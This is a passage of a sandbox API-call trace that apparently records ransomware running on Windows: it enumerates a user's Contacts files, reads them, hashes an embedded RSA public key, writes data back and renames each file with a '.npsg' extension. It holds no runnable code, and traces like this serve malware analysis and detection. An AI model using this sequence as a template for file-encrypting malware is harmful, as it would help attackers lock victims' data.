hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff30 | out: hHeap=0x620000) returned 1 [0235.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0235.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffee8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffed0 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7cf8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.849] WriteFile (in: hFile=0x644, lpBuffer=0x3b7a060*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b7a060*, lpNumberOfBytesWritten=0x39afb14*=0x48e, lpOverlapped=0x0) returned 1 [0235.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.850] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.850] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0235.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7cb70 [0235.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0235.850] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0235.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0235.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0235.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7cb70 | out: hHeap=0x620000) returned 1 [0235.850] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0235.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.850] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0235.850] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0235.851] CloseHandle (hObject=0x644) returned 1 [0235.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b947f8 [0235.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0235.852] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.npsg")) returned 1 [0235.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.868] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.868] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0235.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a440 | out: hHeap=0x620000) returned 1 [0235.870] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0235.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c52a8 [0235.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a440 [0235.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c52a8 | out: hHeap=0x620000) returned 1 [0235.870] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0235.870] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0235.873] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=1177) returned 1 [0235.873] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0235.876] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0235.876] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0235.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.878] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.878] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x499, lpOverlapped=0x0) returned 1 [0235.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x6962b0 [0235.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.878] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0235.878] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0235.879] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0235.879] CryptHashData (hHash=0x33f0408, pbData=0x6962b0, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0235.879] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0235.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0235.879] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0235.879] GetLastError () returned 0x0 [0235.879] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.880] GetLastError () returned 0x0 [0235.880] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.881] SetLastError (dwErrCode=0x0) [0235.881] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] GetLastError () returned 0x0 [0235.882] SetLastError (dwErrCode=0x0) [0235.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0235.882] CryptDestroyHash (hHash=0x33f0408) returned 1 [0235.882] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0235.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6962b0 | out: hHeap=0x620000) returned 1 [0235.883] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0235.883] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.883] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0235.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a0) returned 0x3b7a060 [0235.883] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0235.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x6962b0 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x346fd28 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7cf8 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffed0 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7d40 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffee8 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fffc0 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0235.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x64dd08 [0235.884] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x64dd08, Size=0x218) returned 0x3b947f8 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b94a18 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a18 | out: hHeap=0x620000) returned 1 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x33fffc0 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x33ffea0 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x33b8188 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0235.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fffc0 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0235.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ffea0 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fff60 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0235.885] GetCurrentThreadId () returned 0x5b4 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x687d30 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.885] GetCurrentThreadId () returned 0x5b4 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0235.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c52a8 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33fff60 [0235.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x33ffea0 [0235.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0235.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0235.886] RtlAllocateHeap (HeapHandle=0x620000, 